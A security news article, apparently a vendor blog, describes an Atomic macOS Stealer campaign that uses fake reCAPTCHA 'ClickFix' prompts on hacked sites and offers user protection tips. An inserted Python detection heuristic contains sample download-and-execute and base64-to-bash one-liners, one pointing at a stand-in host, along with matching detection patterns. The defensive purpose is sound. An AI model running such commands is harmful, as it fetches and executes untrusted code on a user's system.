
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users Through Hacked Sites

Updated: 2 days ago

Apple users are facing a new and sophisticated threat as a widespread Atomic macOS Stealer (AMOS) campaign leverages the "ClickFix" social engineering tactic. This campaign exploits thousands of hacked websites, tricking users into unknowingly installing malware that steals sensitive data, including passwords, cryptocurrency, and personal files.


New Malware Campaign Targets macOS Users

A new and extensive malware campaign, dubbed "MacReaper," is actively targeting macOS users. This operation utilizes a deceptive technique known as "ClickFix" or "ClearFix," which presents fake Google reCAPTCHA verification interfaces exclusively to macOS users on compromised websites. Security researchers have identified over 2,800 hacked websites involved in this campaign.

How the ClickFix Tactic Works

The ClickFix tactic is particularly insidious because it bypasses traditional security measures by manipulating users into self-compromising their systems. The process unfolds as follows:

  • Deceptive Verification Pop-up: When a user visits a compromised website, a pop-up resembling a reCAPTCHA verification appears.

  • Malicious Code Copy: Upon clicking "I'm not a robot," malicious code is silently copied to the user's clipboard.

  • Instructions for Self-Infection: The user is then presented with instructions to open Terminal and paste the copied code, often using familiar Apple keyboard shortcuts.

  • Malware Download and Installation: Executing this command downloads and installs the Atomic Stealer malware onto the user's Mac.

This method relies heavily on social engineering, exploiting users' familiarity with online verification processes to trick them into performing actions they normally wouldn't.
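As an added illustration (not code from the article or any of its sources), the following detection heuristic runs over constructed macOS process-creation events and flags commands launched from an interactive Terminal that chain a download or decode step with an execution step, which is the shape of the command a ClickFix page asks the victim to paste. The event format, field names, parent-path fragments and sample lines are all assumptions.

```python
import json
import re

# Constructed sample of macOS process-creation events (not from the article):
# one JSON object per line, with parent, process and command line.
SAMPLE_EVENTS = """
{"ts":"2025-04-25T10:02:11Z","parent":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","cmdline":"zsh -c ls -la ~/Downloads"}
{"ts":"2025-04-25T10:05:43Z","parent":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","cmdline":"zsh -c echo aGVsbG8= | base64 -d | bash"}
{"ts":"2025-04-25T10:06:01Z","parent":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","cmdline":"zsh -c curl -fsSL https://example.invalid/x -o /tmp/u && chmod +x /tmp/u && /tmp/u"}
{"ts":"2025-04-25T10:07:30Z","parent":"/usr/sbin/cron","cmdline":"sh -c curl -s https://example.invalid/health"}
"""

# Interactive terminals a victim would paste into (assumed parent-path fragments).
TERMINAL_APPS = ("Terminal.app", "iTerm.app")

# Building blocks of a pasted download-and-run one-liner.
PATTERNS = [
    ("download-tool", re.compile(r"\b(curl|wget)\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(sh|bash|zsh)\b")),
    ("base64-decode", re.compile(r"\bbase64\s+(-d|--decode|-D)\b")),
    ("exec-from-tmp", re.compile(r"chmod\s+\+x\s+(/tmp|/private/tmp|/var/folders)\S*")),
    ("osascript", re.compile(r"\bosascript\s+-e\b")),
]

def score(cmdline):
    """Return the names of every ClickFix-style building block found in a command line."""
    return [name for name, rx in PATTERNS if rx.search(cmdline)]

def detect_clickfix(events_text):
    """Flag commands launched from an interactive terminal that combine at least
    two building blocks (e.g. a download plus an execution step)."""
    alerts = []
    for line in events_text.strip().splitlines():
        ev = json.loads(line)
        # ClickFix needs the victim to paste into a terminal; cron/daemon children are ignored.
        if not any(app in ev["parent"] for app in TERMINAL_APPS):
            continue
        reasons = score(ev["cmdline"])
        if len(reasons) >= 2:  # one block alone (a plain curl) is too noisy to alert on
            alerts.append({"ts": ev["ts"], "cmdline": ev["cmdline"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert["ts"], alert["reasons"], alert["cmdline"])
```

The same logic applies unchanged to a real telemetry feed once the field names are mapped; the two-block threshold is what keeps ordinary `curl` use from alerting.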

The Threat of Atomic Stealer (AMOS)

Atomic Stealer (AMOS) is a potent information-stealing malware available as a Malware-as-a-Service (MaaS). Once installed, AMOS can steal a wide range of sensitive data, including:

  • Credentials stored in macOS Keychain

  • Cookies, passwords, and autofill data from popular browsers like Chrome and Firefox

  • Sensitive files from the infected device

  • Digital currency from over 50 cryptocurrency wallets and extensions

This malware has been observed since April 2023 and is sold on underground forums for up to $3,000 per month, indicating its widespread use by cybercriminals.

Advanced Evasion Techniques

This campaign employs sophisticated techniques to evade detection and resist takedowns:

  • EtherHiding: Malicious commands are stored in smart contracts on the Binance Smart Chain blockchain, giving the operators a resilient command and control channel that traditional blocklists and takedowns struggle to disrupt.

  • Signed Mach-O Binary: The malware uses a signed Mach-O binary, allowing it to bypass macOS Gatekeeper security protections.

  • Targeted Delivery: The attack is meticulously designed to target macOS users, with client-side and server-side mechanisms ensuring the ClickFix interface is displayed only on macOS devices.

Protecting Your Mac from This Threat

To safeguard against this evolving threat, users should adopt the following security practices:

  • Never Execute Unprompted Terminal Commands: Be extremely wary of any website prompting you to open Terminal and paste commands, especially during CAPTCHA or verification processes.

  • Be Skeptical of Verification Pop-ups: If a verification pop-up looks unfamiliar or asks you to do anything outside the browser, close the website immediately.

  • Use Reputable Antivirus Software: While macOS has built-in security, consider using a reputable third-party Mac antivirus solution for additional protection.

  • Keep Software Updated: Ensure your macOS and all security software are updated with the latest patches.

  • Practice Good Cyber Hygiene: Stick to known and trusted websites, and be cautious of suspicious links or unexpected prompts.

By understanding the tactics employed by these attackers and implementing robust security measures, macOS users can significantly reduce their risk of falling victim to the Atomic Stealer campaign.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.
